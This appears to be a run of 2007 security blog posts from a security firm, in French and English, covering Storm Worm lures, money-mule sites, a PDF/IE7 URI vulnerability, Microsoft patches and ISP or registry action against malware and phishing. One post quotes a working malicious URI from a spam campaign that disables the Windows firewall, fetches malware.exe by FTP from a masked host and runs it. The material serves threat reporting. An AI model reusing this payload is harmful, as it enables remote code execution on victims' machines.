Les attaques de Storm Worm, c'est un peu comme l'actualité des journaux "people", ça n'a pas vraiment d'importance (du moins pour tout le monde), mais on ne se lasse pas de les regarder (du moins pour certains)...

En cette soirée de "Halloween" pour les Canadiens, Anglais, Américains et éventuellement pour les Européens, voici donc l'un des jolis vrais-faux sites Web faisant la promotion du vrai-faux jeu super sympa pour "faire danser le squelette" :

La technique quasi force-brute consistant à spammer encore et encore en profitant de l'actualité ou des incitations classiques ("sex", "games" et "crack" en tout genre) demeure payante pour les attaquants. De plus, les auteurs de Storm font preuve de compétences graphiques inhabituelles pour "crédibiliser" leurs arnaques - et ça change des spams traduits du Russe en Français grâce à "Google Translate".

On ne doit ainsi pas oublier que selon les différentes estimations, le nombre de machines infectées depuis le début de l'année oscille entre 5 et 15 millions (ce qui s'appelle une belle fourchette), mais aujourd'hui, le nombre de machines actives toujours infectées aurait cependant fortement baissé (PPT) ... voire jamais existé !

Nous avions posté il y a quelques temps un billet relatif aux fournisseurs d'accès Internet (FAI) . Celui-ci avait pour but de souligner le manque de réaction de certains FAI par rapport aux contenus illicites, notamment face aux sites exclusivement destinés à propager du malware.

Les choses sont peut-être finalement en train d'évoluer dans le bon sens, comme le montre une disposition prise par le prestataire belge SCARLET. Ce fournisseur d'accès Internet belge a décidé de filtrer sur son réseau à partir de début 2008 les sites qui seront considérés comme pédo-pornographiques.

Techniquement, il s'agirait de procéder par un système de liste noire (blacklist) établi par les autorités belges. Le maintien à jour de ces listes risque néanmoins de se révéler un épineux problème. Il faudra en effet établir des critères précis pour désigner les sites ciblés, qui en plus changent régulièrement d'hébergeur et de pays d'hébergement, afin de rester en ligne le plus longtemps possible.

Ce genre de mesure est déjà active en Suisse, pays dans lequel plusieurs FAI bloquent déjà les accès à des sites de pornographie enfantine au moyen de listes établies par l'Office Fédéral de la Police (Fedpol) et le SCOSI (Service national de COordination de la lutte contre la Criminalité sur Internet).

Si d'aventure l'ensemble des FAI mondiaux faisaient de même, le risque serait, après une courte période, de voir ces sites pédo-pornographiques se faire héberger sur des machines compromises de particuliers organisées en botnet. Cette mesure permettrait ainsi aux criminels de contourner les blacklist, qui ne pourraient plus être assez réactives.

Reste également le problème soulevé par une censure exercée sur Internet. Cette initiative de Scarlet peut susciter une oppositon de la part des partisans de la libre expression sur Internet. Mais à bien y réfléchir, cette mesure n'est que la matérialisation de l'obligation faite aux hébergeurs dans certains pays de procéder à la fermeture d'un site dès lors qu'il est établi qu'il présente du contenu illicite.

Une campagne de spams contenant un fichier PDF malicieux exploitant la récente vulnérabilité des produits Adobe (Réf. Lexsi 9077) a été détectée aujourd'hui. Le fichier PDF est conçu de telle sorte qu'il télécharge via ftp un malware encore non reconnu par les solutions antivirales, par le biais d'une URI spécialement formée :

mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o xx.yy.zz.tt>1&echo binary>>1&echo get /malware.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start malware.exe&\" \"&\" "nul.bat

Chose amusante, le serveur délivrant le malware est hébergé ... chez RBN (Russian Business Network), hébergeur bien connu pour permettre à des organisations aux pratiques douteuses de mettre en place sur leurs serveurs toutes sortes de sites illégaux.

Le malware récupéré est actuellement en cours d'analyse.

Par chance, Adobe a publié hier un correctif pour cette vulnérabilité, dont les liens sont disponibles dans notre bulletin (Réf. Lexsi 9077). Nous conseillons vivement d'appliquer ce dernier, afin d'éviter des infections par des malwares encore non identifiés.

Mise à jour du 24/10 : ce matin à 10h (GMT+2), le malware qui s'est avéré être un "dropper" pour le malware LD.Pinch, est détecté par 8 antivirus.

Depuis quelques jours, une énième campagne de recrutement de mules a été engagée avec la mise en ligne d'un site représentant une société fictive, Cronos Investment, aux adresses suivantes : crinc.mn, cron.li, crons.cc, crinc.ac, ...

Le template utilisé est le suivant :

Or on peut voir que des coordonnées fictives françaises sont utilisées, et ce n'est d'ailleurs pas la première fois que cette situation se présente sur de tels sites. Le domaine dracomy.eu, participant à la même campagne de recrutement de mules via un autre template -"Draper Investment"-, a par exemple été déposé avec ces informations :

Domaine
Nom dracomy.eu
Statut ENREGISTRE
Enregistrement 10 octobre 2007
Dernière mise à jour 15 octobre 2007 17:42
Registrant
Nom Jacques LEFEBURE
Organisation Jacques
Langue Anglais
Adresse XX, rue de la Gaîté 75014 PARIS
Téléphone +33.3314322XXXX
Email connerartsaw@hotmail.com

Plus de détail sur cette nouvelle campagne sur l'excellent site Bobbear traquant ces pirates. Des liens entre ces campagnes récurrentes de recrutement de mules et le groupe Rock Phish y sont par ailleurs démontrés.

Il y a quelques temps déjà, le chercheur en sécurité pdp de gnucitizen avait annoncé avoir découvert une vulnérabilité permettant l'exécution de code arbitraire à l'aide d'un fichier PDF malicieux (Réf. Lexsi 9077). La publication d'une preuve de concept dans la journée d'hier a permis de faire le lien entre cette vulnérabilité et une faille plus générique concernant la gestion des URI par Windows, lorsque le navigateur Internet Explorer 7 est installé. Par le biais d'une URI spécialement formée, il est ainsi possible d'exécuter une commande arbitraire sur un système vulnérable.

Il est du coup difficile d'incriminer l'un ou l'autre des éditeurs, chacun pouvant à sa façon corriger cette vulnérabilité, Adobe en vérifiant l'URI avant de la passer à Windows, et Microsoft en vérifiant l'URI qui lui est fournie avant de lancer une commande ShellExecute(). La vulnérabilité ne touchant pas seulement les produits Adobe, Microsoft a annoncé qu'un correctif serait publié. Adobe de son côté, s'est pour le moment contenté d'une solution de contournement consistant à modifier une valeur du registre.

On aurait pu en rester là, et se contenter de ne plus ouvrir de fichiers PDF non sûrs avec les produits Adobe en attendant le correctif, mais un autre chercheur a eu la bonne idée d'utiliser une vulnérabilité publiée récemment et concernant Internet Explorer (en fait une variante de la vulnérabilité Réf. Lexsi 4734 datant de trois ans !), permettant le téléchargement automatique d'un document sur le disque dur d'une victime, en l'incitant à suivre un lien spécialement formé (Réf. Lexsi 9172). En y effectuant quelques modifications, il est possible de lancer automatiquement le téléchargement mais surtout l'ouverture d'un fichier PDF arbitraire à l'aide d'un simple clic sur un lien.

La combinaison de ces deux vulnérabilités permet donc l'exécution de commandes arbitraires en incitant une victime à cliquer sur un simple lien, à condition que celle-ci utilise Internet Explorer 7, ainsi qu'Adobe Acrobat ou Reader. La seule solution à ce problème aujourd'hui est d'appliquer la solution de contournement d'Adobe, consistant à modifier une valeur du registre, ce qui ne sera malheureusement mis en oeuvre que par quelques utilisateurs non-lambda soucieux de leur sécurité.

On peut donc raisonnablement s'attendre à une campagne de spam contenant des liens apparemment sans danger mais redirigeant l'utilisateur vers une page web malicieuse qui chargera automatiquement le lien permettant la compromission, ou encore un simple PDF en pièce jointe du courriel dont la simple ouverture volontaire permettra d'obtenir la même conséquence (sous réserve bien sur d'avoir Adode Reader et Internet Explorer 7 installés sur le système).

Enfin, il faut envisager que cette nouvelle technique soit utilisée par des sites de type "drive-by download".

This surely is great news.

Laura Mather from the APWG (Anti-Phishing Working Group) declared that the DotAsia Organisation had agreed to a new policy, consisting of banning domains associated to phishing.

This new registry which has just launched the .asia gTLD (generic Top Level Domain) seems to be willing to close down the domains leading to phishing content.

We're glad to hear this, because registries usually set explicit policies restraining them to interfere in disputes regarding domain names. These policies are particularly driven by their need to protect themselves against legal issues and from overwhelming work.

But to shut down a fraudulent website using fast-flux botnet techniques, your only hope is going after the domain name, and so to contact the registrar. But at the registrar level, it takes often too much time to be really effective because of insufficient staff/process capacity or declared complaisance with fraudsters from some of these companies. (Who said Estdomains?)

Directly shutting down the domain has its advantages compared to remove the content on the hosting side, since there are a growing number of phishing campaigns using "fast flux"-like technology. It is not rare nowadays to see one campaign being hosted on twenty servers or more. Even if one is shut down, the others are still active. But in this case, there is often a single domain leading to all these hosts. Cutting this link is the only efficient way to stop this kind of phishing.

To have the registries getting involved in the fight against phishing would definitely be helpful, particularly if they put some effort (staff members, extended hours…) on the matter. On their side, DotAsia seems to want to rely on a few trusted sources that will send them verified information.

Let’s hope such willingness turn into reality and effective success, and give ideas to the other registries...

Les correctifs de Microsoft du mois d'octobre viennent d'être publiés aujourd'hui. Au menu, pas moins de 4 bulletins critiques, et 2 qualifiés d'importants. Au total, 9 vulnérabilités sont corrigées. Les produits impactés sont Microsoft Windows, Microsoft Outlook Express et Windows Mail, Microsoft Internet Explorer, Microsoft Windows SharePoint Services et Office SharePoint Server, et enfin Microsoft Word.

Parmi ces bulletins, quatre permettent l'exécution de code arbitraire :
MS07-055 : Une vulnérabilité permettant l'exécution de code arbitraire dans Kodak Image Viewer pouvant être exploitée via une image malicieuse (Ref. Lexsi 9140).
MS07-056 : Une vulnérabilité de type débordement de tampon dans le tas dans Microsoft Outlook Express et Windows Mail pouvant être exploitée via une page web malicieuse (Ref. Lexsi 9141).
MS07-057 : Plusieurs vulnérabilités, dont l'une permettant l'exécution de code arbitraire dans Internet Explorer pouvant être exploitée via une page web malicieuse (Ref. Lexsi 9142).
MS07-060 : Une vulnérabilité permettant l'exécution de code arbitraire dans Microsoft Word pouvant être exploitée via un fichier malicieux (Ref. Lexsi 9143).

Les autres vulnérabilités rendent possible des attaques de type déni de service, cross-site scripting ou spoofing d'adresse web :
MS07-057 : Plusieurs vulnérabilités, dont trois permettant d'usurper la barre d'adresse dans Internet Explorer, pouvant être exploitées via une page web malicieuse (Ref. Lexsi 9142), (Ref. Lexsi 8796) et (Ref. Lexsi 8203). Deux d'entre elles avaient déjà été publiées en février et juillet 2007.
MS07-058 : Une vulnérabilité de type déni de service distant dans le service RPC de Microsoft Windows (Ref. Lexsi 9144).
MS07-059 : Une vulnérabilité de type cross-site scripting dans Microsoft Windows SharePoint Services et Office SharePoint Server, pouvant être exploitée via une page web malicieuse (Ref. Lexsi 8552). Cette vulnérabilité avait été rendue publique en mai dernier.

Cette fois-ci encore, les exécutions de code arbitraire ne sont fort heureusement pas possible sans une interaction de la part de l'utilisateur, en lui fournissant un fichier malicieux ou en l'incitant à visiter une page web spécialement formée. Il est donc conseillé une fois de plus de ne pas ouvrir de contenu dont la provenance n'a pas été vérifiée.

In this period full of "Storms" and other malware, spreading worldwide in such an efficient manner, the need for cooperation between security companies has never been so huge.

• Computer Emergency Response Teams (CERT) collaborate on important topics, like fighting against phishing/pharming, providing information to each other, exchanging tips, and so on;
• Law Enforcement Agencies get to work together more and more. Although the system is far from being perfect, it is growing and getting better every day, with new cybercrime laws;
• Anti-Virus companies exchange data with each other, and cooperate with LE and sometimes CERTs;
• Incident Response Teams from many companies are in contact with one another, and are generally working well with LE.

Now what about the ISP who are giving you your daily connection to Internet ? In order to keep things clear, you have to be aware that this article only covers french ISPs.

In 1997, they founded the AFA (Associations des Fournisseurs d'Accès), an association to help develop Internet in France, to inform the public, and to cooperate internationaly with other ISPs. They also provide protection against child porn and are involved in anti-spam organisations. Now what do they do against malware ? You don't need to think about it for long : they do nothing. In some cases where they really could have a positive effect against cybercrime, they choose not to act.

Let's say you are a computer security professional working on a huge botnet. You see thousands of IP addresses from ISP in your country, all sending DNS and TCP packets to badstuff.com. Browsing www.badstuff.com, you see no web content. Now looking at the "whois" data from badstuff.com, you notice immediately it has been created to collect information from bots : it has been registered by John Doe, Planet Earth, h4ck1ngmastah@badstuff.com.

Calling the ISP, you tell him he should block all connections trying to reach this particular domain, because it is hosting the command&control of a big bad botnet, stealing personnal and confidential information to their customers. Moreover, you offer them to provide all the IP addresses+timeline of the infected computers, so that they can call their customers and explain them they are infected.

With usually a charming voice, they answer your request:

• We are sorry, but technically, we cannot block in such way;
• We are sorry, although we could technically do it, we won't, because it would infringe the freedom spirit of the Internet/the privacy rights of our customers;

Now take one of these two sentences as an introduction, and add one of the following, depending on the ISP:

• We are very interested in the IP addresses you collected while studying this botnet. Now we won't tell the users ;
• We are not interested at all, and won't say anything to our customers ;
• We are not interested at all, and if you say anything regarding our customers to the press, or if you say anything to our customers, we will engage a legal procedure against you. (the voice, in this case, is still charming, which is even more frightening).

We talked about blocking a single domain. Now imagine how an ISP reacts when you show him a complete range of malicious IP addresses from a well-known bulletproof hosting company...

Isn't this frustrating ?

The first Phishtank.com annual report was released today.

No big news, but their statistics are still interesting and partially consistent with some of our own findings. France, for instance, occupies the fifth place among countries hosting the most fraudulent sites, with 4,8%. Proxad (parent company of the famous French ISP - Free) is by the way ranked 7th among phishing hosting networks.

But none of the French banks is listed among the first 69 targeted companies. This said, these statistics are of course fragmented, as we see on our side a few hundreds of phishing websites targeting French institutions (including those targeting the Free ISP!).

Brian Krebs's blog provide a copy of this report here and an article on the matter here.